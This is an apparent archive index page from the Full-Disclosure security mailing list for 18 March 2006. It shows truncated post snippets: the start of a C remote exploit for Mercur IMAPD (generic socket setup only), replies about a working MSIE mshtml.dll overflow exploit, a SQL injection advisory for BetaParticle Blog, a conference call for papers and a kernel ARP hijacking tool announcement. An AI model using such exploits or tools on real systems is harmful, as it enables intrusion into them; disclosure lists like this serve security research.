[Full-disclosure] Mercur IMAPD 5.0 SP3 Remote Exploit

2006-03-18 Thread Tang Ellison
#include #include #include #include #pragma comment(lib, "ws2_32")SOCKET ConnectTo(char *ip, int port){WSADATA wsaData; SOCKET s;struct hostent *he;struct sockaddr_in host;int nTimeout=15;if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0){printf("[-]WSAStartup failed.\n");exit(-1);}if((he=gethostbyname(

Re: [Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-18 Thread [EMAIL PROTECTED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 here we say: et puis 100 balles et 1 mars ? hu ;> Manuel Moreno Leiva wrote: > great exploit.. works fine in my workstation > i have WinXp Sp2 IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 > you have a exploit usable for this? > > Best Regards > > Manue

[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

2006-03-18 Thread Manuel Moreno Leiva
great exploit.. works fine in my workstation i have WinXp Sp2 IE 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 you have a exploit usable for this? Best Regards Manuel Moreno AsesoriaPC Stgo,Chile 2006/3/16, Michal Zalewski <[EMAIL PROTECTED]>: > Good morning, > > This might not come as a surprise, but

[Full-disclosure] Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities

2006-03-18 Thread nukedx
--Security Report-- Advisory: BetaParticle Blog <= 6.0 Multiple Remote SQL Injection Vulnerabilities --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 18/03/06 05:27 PM --- Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com } --- Vendor: BetaParticle (ht

[Full-disclosure] IMF 2006 - 2nd Call for Papers

2006-03-18 Thread Oliver Goebel
Dear all, FYI: This is the second call for papers for the IMF Conference 2006. Please mind the submission dead line on 2006-04-17. Please excuse possible cross-postings. --- 2nd CALL FOR PAPERS

[Full-disclosure] Kernel level ARP hijacking

2006-03-18 Thread Don Bailey
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Yes, it's old school, but ARP hijacking is often useful (especially in 802.11). KArp is a simple Linux kernel level ARP hijacking utility that is easily configured via ProcFS or via the sysctl mechanism. Because it's not a userland tool, and becaus